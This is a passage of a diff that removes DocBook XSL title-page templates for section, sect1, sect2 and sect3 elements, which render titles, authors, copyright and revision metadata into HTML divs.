- <xsl:apply-templates mode="section.titlepage.recto.auto.mode" select="sectioninfo/authorgroup"/>
- <xsl:apply-templates mode="section.titlepage.recto.auto.mode" select="info/authorgroup"/>
- <xsl:apply-templates mode="section.titlepage.recto.auto.mode" select="sectioninfo/author"/>
- <xsl:apply-templates mode="section.titlepage.recto.auto.mode" select="info/author"/>
- <xsl:apply-templates mode="section.titlepage.recto.auto.mode" select="sectioninfo/othercredit"/>
- <xsl:apply-templates mode="section.titlepage.recto.auto.mode" select="info/othercredit"/>
- <xsl:apply-templates mode="section.titlepage.recto.auto.mode" select="sectioninfo/releaseinfo"/>
- <xsl:apply-templates mode="section.titlepage.recto.auto.mode" select="info/releaseinfo"/>
- <xsl:apply-templates mode="section.titlepage.recto.auto.mode" select="sectioninfo/copyright"/>
- <xsl:apply-templates mode="section.titlepage.recto.auto.mode" select="info/copyright"/>
- <xsl:apply-templates mode="section.titlepage.recto.auto.mode" select="sectioninfo/legalnotice"/>
- <xsl:apply-templates mode="section.titlepage.recto.auto.mode" select="info/legalnotice"/>
- <xsl:apply-templates mode="section.titlepage.recto.auto.mode" select="sectioninfo/pubdate"/>
- <xsl:apply-templates mode="section.titlepage.recto.auto.mode" select="info/pubdate"/>
- <xsl:apply-templates mode="section.titlepage.recto.auto.mode" select="sectioninfo/revision"/>
- <xsl:apply-templates mode="section.titlepage.recto.auto.mode" select="info/revision"/>
- <xsl:apply-templates mode="section.titlepage.recto.auto.mode" select="sectioninfo/revhistory"/>
- <xsl:apply-templates mode="section.titlepage.recto.auto.mode" select="info/revhistory"/>
- <xsl:apply-templates mode="section.titlepage.recto.auto.mode" select="sectioninfo/abstract"/>
- <xsl:apply-templates mode="section.titlepage.recto.auto.mode" select="info/abstract"/>
-</xsl:template>
-
-<xsl:template name="section.titlepage.verso">
-</xsl:template>
-
-<xsl:template name="section.titlepage.separator"><xsl:if test="count(parent::*)='0'"><hr/></xsl:if>
-</xsl:template>
-
-<xsl:template name="section.titlepage.before.recto">
-</xsl:template>
-
-<xsl:template name="section.titlepage.before.verso">
-</xsl:template>
-
-<xsl:template name="section.titlepage">
- <div class="titlepage">
- <xsl:variable name="recto.content">
- <xsl:call-template name="section.titlepage.before.recto"/>
- <xsl:call-template name="section.titlepage.recto"/>
- </xsl:variable>
- <xsl:variable name="recto.elements.count">
- <xsl:choose>
- <xsl:when test="function-available('exsl:node-set')"><xsl:value-of select="count(exsl:node-set($recto.content)/*)"/></xsl:when>
- <xsl:when test="contains(system-property('xsl:vendor'), 'Apache Software Foundation')">
- <!--Xalan quirk--><xsl:value-of select="count(exsl:node-set($recto.content)/*)"/></xsl:when>
- <xsl:otherwise>1</xsl:otherwise>
- </xsl:choose>
- </xsl:variable>
- <xsl:if test="(normalize-space($recto.content) != '') or ($recto.elements.count &gt; 0)">
- <div><xsl:copy-of select="$recto.content"/></div>
- </xsl:if>
- <xsl:variable name="verso.content">
- <xsl:call-template name="section.titlepage.before.verso"/>
- <xsl:call-template name="section.titlepage.verso"/>
- </xsl:variable>
- <xsl:variable name="verso.elements.count">
- <xsl:choose>
- <xsl:when test="function-available('exsl:node-set')"><xsl:value-of select="count(exsl:node-set($verso.content)/*)"/></xsl:when>
- <xsl:when test="contains(system-property('xsl:vendor'), 'Apache Software Foundation')">
- <!--Xalan quirk--><xsl:value-of select="count(exsl:node-set($verso.content)/*)"/></xsl:when>
- <xsl:otherwise>1</xsl:otherwise>
- </xsl:choose>
- </xsl:variable>
- <xsl:if test="(normalize-space($verso.content) != '') or ($verso.elements.count &gt; 0)">
- <div><xsl:copy-of select="$verso.content"/></div>
- </xsl:if>
- <xsl:call-template name="section.titlepage.separator"/>
- </div>
-</xsl:template>
-
-<xsl:template match="*" mode="section.titlepage.recto.mode">
- <!-- if an element isn't found in this mode, -->
- <!-- try the generic titlepage.mode -->
- <xsl:apply-templates select="." mode="titlepage.mode"/>
-</xsl:template>
-
-<xsl:template match="*" mode="section.titlepage.verso.mode">
- <!-- if an element isn't found in this mode, -->
- <!-- try the generic titlepage.mode -->
- <xsl:apply-templates select="." mode="titlepage.mode"/>
-</xsl:template>
-
-<xsl:template match="title" mode="section.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="section.titlepage.recto.style">
-<xsl:apply-templates select="." mode="section.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="subtitle" mode="section.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="section.titlepage.recto.style">
-<xsl:apply-templates select="." mode="section.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="corpauthor" mode="section.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="section.titlepage.recto.style">
-<xsl:apply-templates select="." mode="section.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="authorgroup" mode="section.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="section.titlepage.recto.style">
-<xsl:apply-templates select="." mode="section.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="author" mode="section.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="section.titlepage.recto.style">
-<xsl:apply-templates select="." mode="section.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="othercredit" mode="section.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="section.titlepage.recto.style">
-<xsl:apply-templates select="." mode="section.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="releaseinfo" mode="section.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="section.titlepage.recto.style">
-<xsl:apply-templates select="." mode="section.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="copyright" mode="section.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="section.titlepage.recto.style">
-<xsl:apply-templates select="." mode="section.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="legalnotice" mode="section.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="section.titlepage.recto.style">
-<xsl:apply-templates select="." mode="section.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="pubdate" mode="section.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="section.titlepage.recto.style">
-<xsl:apply-templates select="." mode="section.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="revision" mode="section.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="section.titlepage.recto.style">
-<xsl:apply-templates select="." mode="section.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="revhistory" mode="section.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="section.titlepage.recto.style">
-<xsl:apply-templates select="." mode="section.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="abstract" mode="section.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="section.titlepage.recto.style">
-<xsl:apply-templates select="." mode="section.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template name="sect1.titlepage.recto">
- <xsl:choose>
- <xsl:when test="sect1info/title">
- <xsl:apply-templates mode="sect1.titlepage.recto.auto.mode" select="sect1info/title"/>
- </xsl:when>
- <xsl:when test="info/title">
- <xsl:apply-templates mode="sect1.titlepage.recto.auto.mode" select="info/title"/>
- </xsl:when>
- <xsl:when test="title">
- <xsl:apply-templates mode="sect1.titlepage.recto.auto.mode" select="title"/>
- </xsl:when>
- </xsl:choose>
-
- <xsl:choose>
- <xsl:when test="sect1info/subtitle">
- <xsl:apply-templates mode="sect1.titlepage.recto.auto.mode" select="sect1info/subtitle"/>
- </xsl:when>
- <xsl:when test="info/subtitle">
- <xsl:apply-templates mode="sect1.titlepage.recto.auto.mode" select="info/subtitle"/>
- </xsl:when>
- <xsl:when test="subtitle">
- <xsl:apply-templates mode="sect1.titlepage.recto.auto.mode" select="subtitle"/>
- </xsl:when>
- </xsl:choose>
-
- <xsl:apply-templates mode="sect1.titlepage.recto.auto.mode" select="sect1info/corpauthor"/>
- <xsl:apply-templates mode="sect1.titlepage.recto.auto.mode" select="info/corpauthor"/>
- <xsl:apply-templates mode="sect1.titlepage.recto.auto.mode" select="sect1info/authorgroup"/>
- <xsl:apply-templates mode="sect1.titlepage.recto.auto.mode" select="info/authorgroup"/>
- <xsl:apply-templates mode="sect1.titlepage.recto.auto.mode" select="sect1info/author"/>
- <xsl:apply-templates mode="sect1.titlepage.recto.auto.mode" select="info/author"/>
- <xsl:apply-templates mode="sect1.titlepage.recto.auto.mode" select="sect1info/othercredit"/>
- <xsl:apply-templates mode="sect1.titlepage.recto.auto.mode" select="info/othercredit"/>
- <xsl:apply-templates mode="sect1.titlepage.recto.auto.mode" select="sect1info/releaseinfo"/>
- <xsl:apply-templates mode="sect1.titlepage.recto.auto.mode" select="info/releaseinfo"/>
- <xsl:apply-templates mode="sect1.titlepage.recto.auto.mode" select="sect1info/copyright"/>
- <xsl:apply-templates mode="sect1.titlepage.recto.auto.mode" select="info/copyright"/>
- <xsl:apply-templates mode="sect1.titlepage.recto.auto.mode" select="sect1info/legalnotice"/>
- <xsl:apply-templates mode="sect1.titlepage.recto.auto.mode" select="info/legalnotice"/>
- <xsl:apply-templates mode="sect1.titlepage.recto.auto.mode" select="sect1info/pubdate"/>
- <xsl:apply-templates mode="sect1.titlepage.recto.auto.mode" select="info/pubdate"/>
- <xsl:apply-templates mode="sect1.titlepage.recto.auto.mode" select="sect1info/revision"/>
- <xsl:apply-templates mode="sect1.titlepage.recto.auto.mode" select="info/revision"/>
- <xsl:apply-templates mode="sect1.titlepage.recto.auto.mode" select="sect1info/revhistory"/>
- <xsl:apply-templates mode="sect1.titlepage.recto.auto.mode" select="info/revhistory"/>
- <xsl:apply-templates mode="sect1.titlepage.recto.auto.mode" select="sect1info/abstract"/>
- <xsl:apply-templates mode="sect1.titlepage.recto.auto.mode" select="info/abstract"/>
-</xsl:template>
-
-<xsl:template name="sect1.titlepage.verso">
-</xsl:template>
-
-<xsl:template name="sect1.titlepage.separator"><xsl:if test="count(parent::*)='0'"><hr/></xsl:if>
-</xsl:template>
-
-<xsl:template name="sect1.titlepage.before.recto">
-</xsl:template>
-
-<xsl:template name="sect1.titlepage.before.verso">
-</xsl:template>
-
-<xsl:template name="sect1.titlepage">
- <div class="titlepage">
- <xsl:variable name="recto.content">
- <xsl:call-template name="sect1.titlepage.before.recto"/>
- <xsl:call-template name="sect1.titlepage.recto"/>
- </xsl:variable>
- <xsl:variable name="recto.elements.count">
- <xsl:choose>
- <xsl:when test="function-available('exsl:node-set')"><xsl:value-of select="count(exsl:node-set($recto.content)/*)"/></xsl:when>
- <xsl:when test="contains(system-property('xsl:vendor'), 'Apache Software Foundation')">
- <!--Xalan quirk--><xsl:value-of select="count(exsl:node-set($recto.content)/*)"/></xsl:when>
- <xsl:otherwise>1</xsl:otherwise>
- </xsl:choose>
- </xsl:variable>
- <xsl:if test="(normalize-space($recto.content) != '') or ($recto.elements.count &gt; 0)">
- <div><xsl:copy-of select="$recto.content"/></div>
- </xsl:if>
- <xsl:variable name="verso.content">
- <xsl:call-template name="sect1.titlepage.before.verso"/>
- <xsl:call-template name="sect1.titlepage.verso"/>
- </xsl:variable>
- <xsl:variable name="verso.elements.count">
- <xsl:choose>
- <xsl:when test="function-available('exsl:node-set')"><xsl:value-of select="count(exsl:node-set($verso.content)/*)"/></xsl:when>
- <xsl:when test="contains(system-property('xsl:vendor'), 'Apache Software Foundation')">
- <!--Xalan quirk--><xsl:value-of select="count(exsl:node-set($verso.content)/*)"/></xsl:when>
- <xsl:otherwise>1</xsl:otherwise>
- </xsl:choose>
- </xsl:variable>
- <xsl:if test="(normalize-space($verso.content) != '') or ($verso.elements.count &gt; 0)">
- <div><xsl:copy-of select="$verso.content"/></div>
- </xsl:if>
- <xsl:call-template name="sect1.titlepage.separator"/>
- </div>
-</xsl:template>
-
-<xsl:template match="*" mode="sect1.titlepage.recto.mode">
- <!-- if an element isn't found in this mode, -->
- <!-- try the generic titlepage.mode -->
- <xsl:apply-templates select="." mode="titlepage.mode"/>
-</xsl:template>
-
-<xsl:template match="*" mode="sect1.titlepage.verso.mode">
- <!-- if an element isn't found in this mode, -->
- <!-- try the generic titlepage.mode -->
- <xsl:apply-templates select="." mode="titlepage.mode"/>
-</xsl:template>
-
-<xsl:template match="title" mode="sect1.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sect1.titlepage.recto.style">
-<xsl:apply-templates select="." mode="sect1.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="subtitle" mode="sect1.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sect1.titlepage.recto.style">
-<xsl:apply-templates select="." mode="sect1.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="corpauthor" mode="sect1.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sect1.titlepage.recto.style">
-<xsl:apply-templates select="." mode="sect1.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="authorgroup" mode="sect1.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sect1.titlepage.recto.style">
-<xsl:apply-templates select="." mode="sect1.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="author" mode="sect1.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sect1.titlepage.recto.style">
-<xsl:apply-templates select="." mode="sect1.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="othercredit" mode="sect1.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sect1.titlepage.recto.style">
-<xsl:apply-templates select="." mode="sect1.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="releaseinfo" mode="sect1.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sect1.titlepage.recto.style">
-<xsl:apply-templates select="." mode="sect1.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="copyright" mode="sect1.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sect1.titlepage.recto.style">
-<xsl:apply-templates select="." mode="sect1.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="legalnotice" mode="sect1.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sect1.titlepage.recto.style">
-<xsl:apply-templates select="." mode="sect1.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="pubdate" mode="sect1.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sect1.titlepage.recto.style">
-<xsl:apply-templates select="." mode="sect1.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="revision" mode="sect1.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sect1.titlepage.recto.style">
-<xsl:apply-templates select="." mode="sect1.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="revhistory" mode="sect1.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sect1.titlepage.recto.style">
-<xsl:apply-templates select="." mode="sect1.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="abstract" mode="sect1.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sect1.titlepage.recto.style">
-<xsl:apply-templates select="." mode="sect1.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template name="sect2.titlepage.recto">
- <xsl:choose>
- <xsl:when test="sect2info/title">
- <xsl:apply-templates mode="sect2.titlepage.recto.auto.mode" select="sect2info/title"/>
- </xsl:when>
- <xsl:when test="info/title">
- <xsl:apply-templates mode="sect2.titlepage.recto.auto.mode" select="info/title"/>
- </xsl:when>
- <xsl:when test="title">
- <xsl:apply-templates mode="sect2.titlepage.recto.auto.mode" select="title"/>
- </xsl:when>
- </xsl:choose>
-
- <xsl:choose>
- <xsl:when test="sect2info/subtitle">
- <xsl:apply-templates mode="sect2.titlepage.recto.auto.mode" select="sect2info/subtitle"/>
- </xsl:when>
- <xsl:when test="info/subtitle">
- <xsl:apply-templates mode="sect2.titlepage.recto.auto.mode" select="info/subtitle"/>
- </xsl:when>
- <xsl:when test="subtitle">
- <xsl:apply-templates mode="sect2.titlepage.recto.auto.mode" select="subtitle"/>
- </xsl:when>
- </xsl:choose>
-
- <xsl:apply-templates mode="sect2.titlepage.recto.auto.mode" select="sect2info/corpauthor"/>
- <xsl:apply-templates mode="sect2.titlepage.recto.auto.mode" select="info/corpauthor"/>
- <xsl:apply-templates mode="sect2.titlepage.recto.auto.mode" select="sect2info/authorgroup"/>
- <xsl:apply-templates mode="sect2.titlepage.recto.auto.mode" select="info/authorgroup"/>
- <xsl:apply-templates mode="sect2.titlepage.recto.auto.mode" select="sect2info/author"/>
- <xsl:apply-templates mode="sect2.titlepage.recto.auto.mode" select="info/author"/>
- <xsl:apply-templates mode="sect2.titlepage.recto.auto.mode" select="sect2info/othercredit"/>
- <xsl:apply-templates mode="sect2.titlepage.recto.auto.mode" select="info/othercredit"/>
- <xsl:apply-templates mode="sect2.titlepage.recto.auto.mode" select="sect2info/releaseinfo"/>
- <xsl:apply-templates mode="sect2.titlepage.recto.auto.mode" select="info/releaseinfo"/>
- <xsl:apply-templates mode="sect2.titlepage.recto.auto.mode" select="sect2info/copyright"/>
- <xsl:apply-templates mode="sect2.titlepage.recto.auto.mode" select="info/copyright"/>
- <xsl:apply-templates mode="sect2.titlepage.recto.auto.mode" select="sect2info/legalnotice"/>
- <xsl:apply-templates mode="sect2.titlepage.recto.auto.mode" select="info/legalnotice"/>
- <xsl:apply-templates mode="sect2.titlepage.recto.auto.mode" select="sect2info/pubdate"/>
- <xsl:apply-templates mode="sect2.titlepage.recto.auto.mode" select="info/pubdate"/>
- <xsl:apply-templates mode="sect2.titlepage.recto.auto.mode" select="sect2info/revision"/>
- <xsl:apply-templates mode="sect2.titlepage.recto.auto.mode" select="info/revision"/>
- <xsl:apply-templates mode="sect2.titlepage.recto.auto.mode" select="sect2info/revhistory"/>
- <xsl:apply-templates mode="sect2.titlepage.recto.auto.mode" select="info/revhistory"/>
- <xsl:apply-templates mode="sect2.titlepage.recto.auto.mode" select="sect2info/abstract"/>
- <xsl:apply-templates mode="sect2.titlepage.recto.auto.mode" select="info/abstract"/>
-</xsl:template>
-
-<xsl:template name="sect2.titlepage.verso">
-</xsl:template>
-
-<xsl:template name="sect2.titlepage.separator"><xsl:if test="count(parent::*)='0'"><hr/></xsl:if>
-</xsl:template>
-
-<xsl:template name="sect2.titlepage.before.recto">
-</xsl:template>
-
-<xsl:template name="sect2.titlepage.before.verso">
-</xsl:template>
-
-<xsl:template name="sect2.titlepage">
- <div class="titlepage">
- <xsl:variable name="recto.content">
- <xsl:call-template name="sect2.titlepage.before.recto"/>
- <xsl:call-template name="sect2.titlepage.recto"/>
- </xsl:variable>
- <xsl:variable name="recto.elements.count">
- <xsl:choose>
- <xsl:when test="function-available('exsl:node-set')"><xsl:value-of select="count(exsl:node-set($recto.content)/*)"/></xsl:when>
- <xsl:when test="contains(system-property('xsl:vendor'), 'Apache Software Foundation')">
- <!--Xalan quirk--><xsl:value-of select="count(exsl:node-set($recto.content)/*)"/></xsl:when>
- <xsl:otherwise>1</xsl:otherwise>
- </xsl:choose>
- </xsl:variable>
- <xsl:if test="(normalize-space($recto.content) != '') or ($recto.elements.count &gt; 0)">
- <div><xsl:copy-of select="$recto.content"/></div>
- </xsl:if>
- <xsl:variable name="verso.content">
- <xsl:call-template name="sect2.titlepage.before.verso"/>
- <xsl:call-template name="sect2.titlepage.verso"/>
- </xsl:variable>
- <xsl:variable name="verso.elements.count">
- <xsl:choose>
- <xsl:when test="function-available('exsl:node-set')"><xsl:value-of select="count(exsl:node-set($verso.content)/*)"/></xsl:when>
- <xsl:when test="contains(system-property('xsl:vendor'), 'Apache Software Foundation')">
- <!--Xalan quirk--><xsl:value-of select="count(exsl:node-set($verso.content)/*)"/></xsl:when>
- <xsl:otherwise>1</xsl:otherwise>
- </xsl:choose>
- </xsl:variable>
- <xsl:if test="(normalize-space($verso.content) != '') or ($verso.elements.count &gt; 0)">
- <div><xsl:copy-of select="$verso.content"/></div>
- </xsl:if>
- <xsl:call-template name="sect2.titlepage.separator"/>
- </div>
-</xsl:template>
-
-<xsl:template match="*" mode="sect2.titlepage.recto.mode">
- <!-- if an element isn't found in this mode, -->
- <!-- try the generic titlepage.mode -->
- <xsl:apply-templates select="." mode="titlepage.mode"/>
-</xsl:template>
-
-<xsl:template match="*" mode="sect2.titlepage.verso.mode">
- <!-- if an element isn't found in this mode, -->
- <!-- try the generic titlepage.mode -->
- <xsl:apply-templates select="." mode="titlepage.mode"/>
-</xsl:template>
-
-<xsl:template match="title" mode="sect2.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sect2.titlepage.recto.style">
-<xsl:apply-templates select="." mode="sect2.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="subtitle" mode="sect2.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sect2.titlepage.recto.style">
-<xsl:apply-templates select="." mode="sect2.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="corpauthor" mode="sect2.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sect2.titlepage.recto.style">
-<xsl:apply-templates select="." mode="sect2.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="authorgroup" mode="sect2.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sect2.titlepage.recto.style">
-<xsl:apply-templates select="." mode="sect2.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="author" mode="sect2.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sect2.titlepage.recto.style">
-<xsl:apply-templates select="." mode="sect2.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="othercredit" mode="sect2.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sect2.titlepage.recto.style">
-<xsl:apply-templates select="." mode="sect2.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="releaseinfo" mode="sect2.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sect2.titlepage.recto.style">
-<xsl:apply-templates select="." mode="sect2.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="copyright" mode="sect2.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sect2.titlepage.recto.style">
-<xsl:apply-templates select="." mode="sect2.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="legalnotice" mode="sect2.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sect2.titlepage.recto.style">
-<xsl:apply-templates select="." mode="sect2.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="pubdate" mode="sect2.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sect2.titlepage.recto.style">
-<xsl:apply-templates select="." mode="sect2.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="revision" mode="sect2.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sect2.titlepage.recto.style">
-<xsl:apply-templates select="." mode="sect2.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="revhistory" mode="sect2.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sect2.titlepage.recto.style">
-<xsl:apply-templates select="." mode="sect2.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="abstract" mode="sect2.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sect2.titlepage.recto.style">
-<xsl:apply-templates select="." mode="sect2.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template name="sect3.titlepage.recto">
- <xsl:choose>
- <xsl:when test="sect3info/title">
- <xsl:apply-templates mode="sect3.titlepage.recto.auto.mode" select="sect3info/title"/>
- </xsl:when>
- <xsl:when test="info/title">
- <xsl:apply-templates mode="sect3.titlepage.recto.auto.mode" select="info/title"/>
- </xsl:when>
- <xsl:when test="title">
- <xsl:apply-templates mode="sect3.titlepage.recto.auto.mode" select="title"/>
- </xsl:when>
- </xsl:choose>
-
- <xsl:choose>
- <xsl:when test="sect3info/subtitle">
- <xsl:apply-templates mode="sect3.titlepage.recto.auto.mode" select="sect3info/subtitle"/>
- </xsl:when>
- <xsl:when test="info/subtitle">
- <xsl:apply-templates mode="sect3.titlepage.recto.auto.mode" select="info/subtitle"/>
- </xsl:when>
- <xsl:when test="subtitle">
- <xsl:apply-templates mode="sect3.titlepage.recto.auto.mode" select="subtitle"/>
- </xsl:when>
- </xsl:choose>
-
- <xsl:apply-templates mode="sect3.titlepage.recto.auto.mode" select="sect3info/corpauthor"/>
- <xsl:apply-templates mode="sect3.titlepage.recto.auto.mode" select="info/corpauthor"/>
- <xsl:apply-templates mode="sect3.titlepage.recto.auto.mode" select="sect3info/authorgroup"/>
- <xsl:apply-templates mode="sect3.titlepage.recto.auto.mode" select="info/authorgroup"/>
- <xsl:apply-templates mode="sect3.titlepage.recto.auto.mode" select="sect3info/author"/>
- <xsl:apply-templates mode="sect3.titlepage.recto.auto.mode" select="info/author"/>
- <xsl:apply-templates mode="sect3.titlepage.recto.auto.mode" select="sect3info/othercredit"/>
- <xsl:apply-templates mode="sect3.titlepage.recto.auto.mode" select="info/othercredit"/>
- <xsl:apply-templates mode="sect3.titlepage.recto.auto.mode" select="sect3info/releaseinfo"/>
- <xsl:apply-templates mode="sect3.titlepage.recto.auto.mode" select="info/releaseinfo"/>
- <xsl:apply-templates mode="sect3.titlepage.recto.auto.mode" select="sect3info/copyright"/>
- <xsl:apply-templates mode="sect3.titlepage.recto.auto.mode" select="info/copyright"/>
- <xsl:apply-templates mode="sect3.titlepage.recto.auto.mode" select="sect3info/legalnotice"/>
- <xsl:apply-templates mode="sect3.titlepage.recto.auto.mode" select="info/legalnotice"/>
- <xsl:apply-templates mode="sect3.titlepage.recto.auto.mode" select="sect3info/pubdate"/>
- <xsl:apply-templates mode="sect3.titlepage.recto.auto.mode" select="info/pubdate"/>
- <xsl:apply-templates mode="sect3.titlepage.recto.auto.mode" select="sect3info/revision"/>
- <xsl:apply-templates mode="sect3.titlepage.recto.auto.mode" select="info/revision"/>
- <xsl:apply-templates mode="sect3.titlepage.recto.auto.mode" select="sect3info/revhistory"/>
- <xsl:apply-templates mode="sect3.titlepage.recto.auto.mode" select="info/revhistory"/>
- <xsl:apply-templates mode="sect3.titlepage.recto.auto.mode" select="sect3info/abstract"/>
- <xsl:apply-templates mode="sect3.titlepage.recto.auto.mode" select="info/abstract"/>
-</xsl:template>
-
-<xsl:template name="sect3.titlepage.verso">
-</xsl:template>
-
-<xsl:template name="sect3.titlepage.separator"><xsl:if test="count(parent::*)='0'"><hr/></xsl:if>
-</xsl:template>
-
-<xsl:template name="sect3.titlepage.before.recto">
-</xsl:template>
-
-<xsl:template name="sect3.titlepage.before.verso">
-</xsl:template>
-
-<xsl:template name="sect3.titlepage">
- <div class="titlepage">
- <xsl:variable name="recto.content">
- <xsl:call-template name="sect3.titlepage.before.recto"/>
- <xsl:call-template name="sect3.titlepage.recto"/>
- </xsl:variable>
- <xsl:variable name="recto.elements.count">
- <xsl:choose>
- <xsl:when test="function-available('exsl:node-set')"><xsl:value-of select="count(exsl:node-set($recto.content)/*)"/></xsl:when>
- <xsl:when test="contains(system-property('xsl:vendor'), 'Apache Software Foundation')">
- <!--Xalan quirk--><xsl:value-of select="count(exsl:node-set($recto.content)/*)"/></xsl:when>
- <xsl:otherwise>1</xsl:otherwise>
- </xsl:choose>
- </xsl:variable>
- <xsl:if test="(normalize-space($recto.content) != '') or ($recto.elements.count &gt; 0)">
- <div><xsl:copy-of select="$recto.content"/></div>
- </xsl:if>
- <xsl:variable name="verso.content">
- <xsl:call-template name="sect3.titlepage.before.verso"/>
- <xsl:call-template name="sect3.titlepage.verso"/>
- </xsl:variable>
- <xsl:variable name="verso.elements.count">
- <xsl:choose>
- <xsl:when test="function-available('exsl:node-set')"><xsl:value-of select="count(exsl:node-set($verso.content)/*)"/></xsl:when>
- <xsl:when test="contains(system-property('xsl:vendor'), 'Apache Software Foundation')">
- <!--Xalan quirk--><xsl:value-of select="count(exsl:node-set($verso.content)/*)"/></xsl:when>
- <xsl:otherwise>1</xsl:otherwise>
- </xsl:choose>
- </xsl:variable>
- <xsl:if test="(normalize-space($verso.content) != '') or ($verso.elements.count &gt; 0)">
- <div><xsl:copy-of select="$verso.content"/></div>
- </xsl:if>
- <xsl:call-template name="sect3.titlepage.separator"/>
- </div>
-</xsl:template>
-
-<xsl:template match="*" mode="sect3.titlepage.recto.mode">
- <!-- if an element isn't found in this mode, -->
- <!-- try the generic titlepage.mode -->
- <xsl:apply-templates select="." mode="titlepage.mode"/>
-</xsl:template>
-
-<xsl:template match="*" mode="sect3.titlepage.verso.mode">
- <!-- if an element isn't found in this mode, -->
- <!-- try the generic titlepage.mode -->
- <xsl:apply-templates select="." mode="titlepage.mode"/>
-</xsl:template>
-
-<xsl:template match="title" mode="sect3.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sect3.titlepage.recto.style">
-<xsl:apply-templates select="." mode="sect3.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="subtitle" mode="sect3.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sect3.titlepage.recto.style">
-<xsl:apply-templates select="." mode="sect3.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="corpauthor" mode="sect3.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="sect3.titlepage.recto.style">
-<xsl:apply-templates select="." mode="sect3.titlepage.recto.mode"/>
